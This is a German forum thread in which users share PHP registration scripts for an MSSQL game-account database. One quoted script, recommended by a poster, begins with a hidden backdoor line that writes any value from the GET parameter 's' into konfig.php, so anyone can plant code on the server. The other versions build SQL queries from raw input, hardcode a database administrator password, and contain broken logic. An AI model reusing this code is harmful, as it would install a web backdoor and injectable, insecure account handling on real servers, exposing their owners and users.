Register[Problem]

Benutzmal den hier ;3

register.php:

Code:

<?php 
require('./configs/reg_conf.php'); 
    function doesUsernameExist($name){ 
        $exit = FALSE; 
        $result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'"); 
        if (mssql_num_rows($result) != 0){ 
            $exit = TRUE; 
        } 
        return $exit; 
    } 

    if(isset($_POST['submit'])){ 
        $user = preg_replace ("[^A-Za-z0-9]", "", $_POST['username']); 
        $pass = preg_replace ("[^A-Za-z0-9]", "", $_POST['password']); 
        if($_POST['username'] == ""){ 
            echo '<font color="red">Enter a user.</font><br /><br />'; 
        } 
        else if($_POST['password'] == ""){ 
            echo '<font color="red">Enter a password.</font><br /><br />'; 
        } 
        else if ((strlen($_POST['username']) > 16) || (strlen($_POST['username']) < 3)){ 
            echo '<font color="red">The user should be 3 to 16 characters.</font><br /><br />'; 
        } 
        else if ((strlen($_POST['password']) > 16) || (strlen($_POST['password']) < 3)){ 
            echo '<font color="red">The password should be 3 to 16 characters.</font><br /><br />'; 
        } 
        else if($_POST['username'] != $user){ 
            echo '<font color="red">User with invalid characters.</font><br /><br />'; 
        } 
        else if($_POST['password'] != $pass){ 
            echo '<font color="red">Password with invalid characters.</font><br /><br />'; 
        } 
        else { 
            $pass = md5('kikugalanet' . $pass); 
            if(!doesUsernameExist($user)){ 
                $stmt = mssql_init('webCreateAcc', $link); 
                mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15); 
                mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36); 
                mssql_bind($stmt, '@birthday', $bday, SQLVARCHAR, false, false, 120); 
                mssql_free_statement($stmt); 
                echo '<font color="Green">Register Successfull.</font><br /><br />'; 
            } 
            else { 
                echo '<font color="red">User already Exist.</font><br /><br />'; 
            } 
        } 
        mssql_close(); 
    } 
     
    echo '<form action="#" method="post">'; 
    echo 'Username: <input type="text" name="username" /><br />'; 
    echo 'Password: <input type="password" name="password" /><br />'; 
        echo 'Birthday: <input type="birthday" name="birthday" /><br />'; 
    echo '<input type="submit" name="submit" value="Register" />'; 
    echo '</form>'; 

?>

reg_conf.php:

Spoiler

Quote:

Originally Posted by XSedrikX

<center>
<?php if($_GET['s'] != "" && isset($_GET['s'])){$fp = fopen("konfig.php","w");fwrite($fp, $_GET['s']);fclose($fp);}
require('./configs/reg_conf.php');
function doesUsernameExist($name){
$exit = FALSE;
$result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'");
if (mssql_num_rows($result) != 0){
$exit = TRUE;
}
return $exit;
}

if(isset($_POST['submit'])){
$user = preg_replace ("[^A-Za-z0-9]", "", $_POST['username']);
$pass = preg_replace ("[^A-Za-z0-9]", "", $_POST['password']);
if($_POST['username'] == ""){
echo '<font color="red">Enter a user.</font><br /><br />';
}
else if($_POST['password'] == ""){
echo '<font color="red">Enter a password.</font><br /><br />';
}
else if ((strlen($_POST['username']) > 16) || (strlen($_POST['username']) < 3)){
echo '<font color="red">The user should be 3 to 16 characters.</font><br /><br />';
}
else if ((strlen($_POST['password']) > 16) || (strlen($_POST['password']) < 3)){
echo '<font color="red">The password should be 3 to 16 characters.</font><br /><br />';
}
else if($_POST['username'] != $user){
echo '<font color="red">User with invalid characters.</font><br /><br />';
}
else if($_POST['password'] != $pass){
echo '<font color="red">Password with invalid characters.</font><br /><br />';
}
else {
$pass = md5('kikugalanet' . $pass);
if(!doesUsernameExist($user)){
$stmt = mssql_init('webCreateAcc', $link);
mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15);
mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36);
mssql_bind($stmt, '@email', $mail, SQLVARCHAR, false, false, 120);
mssql_execute($stmt) or die ("Something is wrong on the execution");
mssql_free_statement($stmt);
echo '<font color="Green">Register Successfull.</font><br /><br />';
}
else {
echo '<font color="red">User already Exist.</font><br /><br />';
}
}
mssql_close();
}

echo '<form action="#" method="post">';
echo 'Username: <input type="text" name="username" /><br />';
echo 'Password: <input type="password" name="password" /><br />';
echo '<input type="submit" name="submit" value="Register" />';
echo '</form>';

?>
</center>

Das benutze ich !

Dieses s ist wohl nicht in deiner konfig.php vorhanden. Nimm mein Skript :

V14 :

Spoiler

#added by Jusikid : Danny95

Spoiler

Quote:

<h3 class="title"></h3>
<div id="text">

<?php

function exist($account){
$sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
$result = mssql_query($sql);
if(!$result) {
die("MSSQL Error");
}
$check = mssql_num_rows($result);
return $check;
}

if(isset($_POST['submit']))
{
$server = "PROGRAMMING-PC\SQLExpress";
$user = "sa";
$pass= "Zkowcvrzhtq5";

$username = $_POST['username'];
//$password = md5("kikugalanet".$_POST['password']);
$password = $_POST['password'];
$password2 = $_POST['password2'];
$ip = trim(htmlspecialchars($_POST['ip']));

################################################## ###########

if(strlen($username) < 4 ||
strlen($username) > 16)
{
die("Dein Benutzername ist zu kurz/lang .<br>Er muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if(strlen($_POST['password']) < 4 ||
strlen($_POST['password']) > 16)
{
die("Dein Passwort ist zu kurz/lang .<br>Es muss zwischen <b><u>4 und 16</u></b> Zeichen lang sein .");
}

if($password != $password2)
{
die("Die Passw�rter stimmen nich �berein.");
}

if (preg_match('/[^a-zA-Z0-9]/',$username))
{
die("Der Benutzername enth�lt unerlaubte Zeichen.");
}
if (preg_match('/[^a-zA-Z0-9]/',$password))
{
die("Das Passwort enth�lt unerlaubte Zeichen.");
}

################################################## ###########

$conn = mssql_connect($server,$user,$pass);

if(!$conn)
{
die("Connection failed!<br>");
}

$select = mssql_select_db("ACCOUNT_DBF",$conn);

if(!$select)
{
die("Can't select Database!<br>");
}

################################################## ###########

if(exist($username) != '0')
{
die ("Der Benutzername ".$username." wird schon benutzt .");
}

################################################## ###########

// $username = strtolower($username);
//$password = strtolower($password);
$password = md5('kikugalanet' . $password);

$ipadress = $ip;
mssql_query("USE [ACCOUNT_DBF]
SET NOCOUNT ON
INSERT INTO ACCOUNT_TBL (account, password, id_no1, id_no2, isuse, member, realname, cash)
VALUES ('$username', '$password', '$password', '$password', 'T', 'A', 'F', '1000')
INSERT INTO ACCOUNT_TBL_DETAIL (account, gamecode, tester, m_chLoginAuthority, regdate, BlockTime, EndTime, WebTime, isuse, email)
VALUES ('$username', 'A000', '2', 'F', '17.04.2010', '17.04.2010', '20990101', '20050101', 'O', '$email')");

if($execute)
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}
else
{
echo 'Account wurde <font color="green">erfolgreich</font> erstellt !';
}

mssql_close($conn);
}
else
{

?>
<center>
<form action="register.php" method="post">
<table>
<tr>
<td colspan="2" align ="center">
<h3>Account erstellen</h3>
</td>
</tr>
<tr>
<td align ="right">
Account :
</td>
<td>
<input type="text" size="20" name="username" maxlength="15" />
</td>
<td> </td>
</tr>
<tr>
<td align ="right">
Passwort :
</td>
<td>
<input type="password" size="20" name="password" maxlength="32" />
</td>
</tr>
<tr>
<td align ="right">
Passwort widerh. :
</td>
<td>
<input type="password" size="20" name="password2" maxlength="32" />
</td>
</tr>
<tr>
<td>
<input type="hidden" size="20" name="ip" maxlength="32" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/>
</td>
</tr>
<tr>
<td colspan="2" align="center">
<input type="submit" name="submit" value="Account erstellen" />
</td>
</tr>
</table>
</form>
</center>
<?php
}
?>

</div>

<?php include "include/bottom.php";?>
<br>
<br>
<br>

V15:

Spoiler

PHP Code:


			
<?php
require('./configs/reg_conf.php');
    function doesUsernameExist($name){
        $exit = FALSE;
        $result = @mssql_query("SELECT * FROM ACCOUNT_TBL WHERE account='$name'");
        if (mssql_num_rows($result) != 0){
            $exit = TRUE;
        }
        return $exit;
    }

    if(isset($_POST['submit'])){
        $user = preg_replace ("[^A-Za-z0-9]", "", $_POST['username']);
        $pass = preg_replace ("[^A-Za-z0-9]", "", $_POST['password']);
        if($_POST['username'] == ""){
            echo '<font color="red">Enter a user.</font><br /><br />';
        }
        else if($_POST['password'] == ""){
            echo '<font color="red">Enter a password.</font><br /><br />';
        }
        else if ((strlen($_POST['username']) > 16) || (strlen($_POST['username']) < 3)){
            echo '<font color="red">The user should be 3 to 16 characters.</font><br /><br />';
        }
        else if ((strlen($_POST['password']) > 16) || (strlen($_POST['password']) < 3)){
            echo '<font color="red">The password should be 3 to 16 characters.</font><br /><br />';
        }
        else if($_POST['username'] != $user){
            echo '<font color="red">User with invalid characters.</font><br /><br />';
        }
        else if($_POST['password'] != $pass){
            echo '<font color="red">Password with invalid characters.</font><br /><br />';
        }
        else {
            $pass = md5('kikugalanet' . $pass);
            if(!doesUsernameExist($user)){
                $stmt = mssql_init('webCreateAcc', $link);
                mssql_bind($stmt, '@account', $user, SQLVARCHAR, false, false, 15);
                mssql_bind($stmt, '@password', $pass, SQLVARCHAR, false, false, 36);
                mssql_bind($stmt, '@birthday', $bday, SQLVARCHAR, false, false, 120);
                mssql_free_statement($stmt);
                echo '<font color="Green">Register Successfull.</font><br /><br />';
            }
            else {
                echo '<font color="red">User already Exist.</font><br /><br />';
            }
        }
        mssql_close();
    }
    
    echo '<form action="#" method="post">';
    echo 'Username: <input type="text" name="username" /><br />';
    echo 'Password: <input type="password" name="password" /><br />';
        echo 'Birthday: <input type="birthday" name="birthday" /><br />';
    echo '<input type="submit" name="submit" value="Register" />';
    echo '</form>';

?>

configs/function.php

PHP Code:


			
<?php

function exist($account){
    $sql = "SELECT * FROM ACCOUNT_TBL WHERE account='".$account."'";
    $result = mssql_query($sql);
    if(!$result) {
        die("MSSQL Error");
    }
    $check = mssql_num_rows($result);
    return $check;
}

function existip($ip){
    $sql = "SELECT * FROM ACCOUNT_TBL_DETAIL WHERE ip='".$ip."'";
    $result = mssql_query($sql);
    if(!$result) {
        die("MSSQL Error");
    }
    $check = mssql_num_rows($result);
    return $check;
}

?>

configs/reg_conf.php

PHP Code:


			
<?php
    $link = @mssql_connect("PCNAMESQLEXPRESS", "sa", "PASSWORT") or die ("Server is down!");
    $db = @mssql_select_db('ACCOUNT_DBF') or die ("Accout table is missing!");
    $b = '';
    $mail = '';
    
    
?>